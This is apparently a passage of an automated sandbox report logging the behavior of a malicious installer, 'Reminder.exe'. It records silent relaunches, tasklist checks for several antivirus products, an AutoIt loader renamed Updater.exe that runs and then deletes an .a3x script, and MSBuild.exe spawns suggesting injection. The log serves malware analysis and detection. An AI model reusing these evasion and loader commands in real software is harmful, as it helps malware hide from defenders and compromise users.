Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00745D7E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 35_2_00745D7E
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073E2AB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CompareStringW,CloseHandle, 35_2_0073E2AB
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00738056 CoCreateInstance,SetErrorMode,GetProcAddress,SetErrorMode, 35_2_00738056
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00743DBD CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 35_2_00743DBD
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp File created: C:\Users\user\AppData\Local\friend
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\cb36de7f397799e419deb9caf3a96a89
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:280:120:WilError_03
Source: C:\Users\user\Desktop\Reminder.exe File created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\friend\Updater.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\edgheaa\AutoIt3.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Reminder.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: MSBuild.exe String found in binary or memory: " /add /y
Source: MSBuild.exe String found in binary or memory: " /add
Source: C:\Users\user\Desktop\Reminder.exe File read: C:\Users\user\Desktop\Reminder.exe
Source: unknown Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp" /SL5="$20434,1768989,845824,C:\Users\user\Desktop\Reminder.exe"
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Process created: C:\Users\user\Desktop\Reminder.exe "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\Desktop\Reminder.exe Process created: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp "C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp" /SL5="$20442,1768989,845824,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Process created: C:\Users\user\AppData\Local\friend\Updater.exe "C:\Users\user\AppData\Local\friend\\Updater.exe" "C:\Users\user\AppData\Local\friend\\yeorling.csv"
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\huv9LF4.a3x && del C:\ProgramData\\huv9LF4.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\friend\Updater.exe updater.exe C:\ProgramData\\huv9LF4.a3x
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\friend\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\edgheaa\AutoIt3.exe "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: unknown Process created: C:\edgheaa\AutoIt3.exe "C:\edgheaa\AutoIt3.exe" C:\edgheaa\fkccfcd.a3x
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\edgheaa\AutoIt3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-B7H8V.tmp\Reminder.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Reminder.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-NL1P1.tmp\Reminder.tmp Section loaded: apphelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\friend\Updater.exe Section loaded: winmm.dll
